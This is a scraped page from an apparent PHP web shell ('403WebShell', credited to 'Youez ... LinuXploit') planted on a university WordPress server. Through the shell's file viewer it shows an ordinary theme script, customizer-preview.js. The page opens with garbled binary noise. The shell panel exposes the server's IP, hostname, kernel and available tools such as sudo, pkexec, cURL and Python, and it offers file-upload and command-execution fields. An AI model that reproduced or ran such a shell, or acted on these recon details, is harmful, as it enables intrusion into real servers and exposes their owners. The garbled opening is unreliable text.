h(  ) ($6;EbBLkfu�_l� ''8;DUFKV3Dd#,?ANk&5G$/(5M\^�ms����Sb�,;R''6c2I�!\����kx�Ve�[i��Me�IYO7:nOL~�Kr�qrv�I:�BM�y��s}r��K����x)1�6@r*2�89ma��&��'ti������{~#������t)1�2<�0:^5�W.uFzQ/u}�v��vv�u��U37yDJeEJo(/�5Ds'1�:Jlu�iy�iy�hw�1;:S`^BMLOQQn,4�7C�8C�>Lfe�]k�[i�Zg��IW�LZ�EP;,.��Tc�q(0) G,/]/1����w�r��l&-t*3�<<�u��#����j&.u��J68\8?"#$%&'()*+,-./0 ! 
Notice: Undefined index: dl in /var/www/html/web/simple.mini.php on line 1
403WebShell
403Webshell
Server IP : 10.254.12.21  /  Your IP : 10.254.12.21
Web Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
System : Linux arit.skru.ac.th 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64
User : apache ( 48)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/skruarchives/wp-content/themes/twenty8teen/js/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/html/skruarchives/wp-content/themes/twenty8teen/js/customizer-preview.js
/**
 * Javascript to make Customizer preview reflect changes without refresh.
 * @package Twenty8teen
 */

( function( $ ) {
	var rootCustomProperty = function( setting ) {
		var bStyle = document.createElement( 'style' );
		document.head.appendChild( bStyle );
		setting.bind( function( newval ) {
			bStyle.innerHTML = ':root { --' + setting.id + ': ' + newval + ' }';
		} );
	};

	// Header text color.
	wp.customize( 'header_textcolor', function( setting ) {
		var hStyle = document.createElement( 'style' );
		document.head.appendChild( hStyle );
		setting.bind( function( newval ) {
			var css = '.site-title, .site-description';
			if ( 'blank' === newval ) {
				css += ' { clip: rect(1px, 1px, 1px, 1px); position: absolute; } :root { --header_textcolor: currentColor }';
			} else {
				css += ' { clip: auto; position: relative } :root { --header_textcolor: ' + newval + ' } ';
			};
			hStyle.innerHTML = css;
		} );
	} );
	wp.customize( 'background_color', rootCustomProperty );
	wp.customize( 'accent_color', function( setting ) {
		var bStyle = document.createElement( 'style' );
		document.head.appendChild( bStyle );
		setting.bind( function( newval ) {
			var out = 'radial-gradient(circle, rgba(250, 250, 250, 0) calc(100% - 150px), ' + newval + ')';
			bStyle.innerHTML = '.vignette::before {background-image: ' + out + '}' +
				':root { --accent_color: ' + newval + ' }';
			// In Edge 15 is not possible to use css variables in pseudo elements.
		} );
	} );
	wp.customize( 'body_textcolor', rootCustomProperty );
	wp.customize( 'link_color', rootCustomProperty );

	wp.customize( 'identimage_alpha', rootCustomProperty );
	wp.customize( 'font_size_adjust', function( setting ) {
		var bStyle = document.createElement( 'style' );
		document.head.appendChild( bStyle );
		setting.bind( function( newval ) {
			bStyle.innerHTML = ':root { --font_size_adjust: ' + newval * 2 + ' }';
		} );
	} );
	wp.customize( 'show_vignette', function( setting ) {
		setting.bind( function( show ) {
			$( 'body' ).toggleClass( 'vignette', show );
		} );
	} );
	wp.customize( 'show_header_imagebehind', function( setting ) {
		setting.bind( function( show ) {
			$( 'body' ).toggleClass( 'header-behind', show );
			$( '.header-image' ).toggleClass( 'image-behind', show );
		} );
	} );
	wp.customize( 'show_as_cards', function( setting ) {
		setting.bind( function( show ) {
			$( '.entry' ).toggleClass( 'cards', show );
		} );
	} );
	wp.customize( 'switch_sidebar', function( setting ) {
		setting.bind( function( show ) {
			$( 'body' ).toggleClass( 'sidebar-leading', show );
		} );
	} );
	wp.customize( 'start_in_tableview', function( setting ) {
		setting.bind( function( view ) {
			$( '.archive main, .search main, .blog main' ).toggleClass( 'table-view', view );
		} );
	} );

	var areaToggle = function( selector, classes ) {
		if ( classes.indexOf( ',' ) === -1 ) {
			classes = ',' + classes;
		}
		var list = classes.split( ',' );
		if ( list[0] ) {
			$( selector ).removeClass( list[0] );
		}
		if ( list[1] ) {
			$( selector ).addClass( list[1] );
		}
	};
	wp.customize( 'featured_image_classes', function( setting ) {
		setting.bind( function( classes ) {
			areaToggle( '.wp-post-image-identimage-wrap, .wp-post-image:not(.identimage)', classes );
		} );
	} );
	wp.customize( 'area_classes[header]', function( setting ) {
		setting.bind( function( classes ) {
			areaToggle( '#masthead', classes );
		} );
	} );
	wp.customize( 'area_classes[main]', function( setting ) {
		setting.bind( function( classes ) {
			areaToggle( 'main', classes );
		} );
	} );
	wp.customize( 'area_classes[content]', function( setting ) {
		setting.bind( function( classes ) {
			areaToggle( '#content', classes );
		} );
	} );
	wp.customize( 'area_classes[comments]', function( setting ) {
		setting.bind( function( classes ) {
			areaToggle( '#comments', classes );
		} );
	} );
	wp.customize( 'area_classes[sidebar]', function( setting ) {
		setting.bind( function( classes ) {
			areaToggle( '#sidebar', classes );
		} );
	} );
	wp.customize( 'area_classes[footer]', function( setting ) {
		setting.bind( function( classes ) {
			areaToggle( '#footer', classes );
		} );
	} );
	wp.customize( 'area_classes[widgets]', function( setting ) {
		setting.bind( function( classes ) {
			areaToggle( '.widget', classes );
		} );
	} );
/*
 * For pages with presets, disable the options in the preset so the preview is correct.
 * Child theme options need to load before this to ensure they are disabled.
 */
	if ( typeof twenty8teenPagePreset !== 'undefined' ) {
		_.each( twenty8teenPagePreset.vars, function( id ) {
			wp.customize( id, function( setting ) {
				setting.callbacks.disable();
			} );
		}	);
	}

} )( jQuery );

Youez - 2016 - github.com/yon3zu
LinuXploit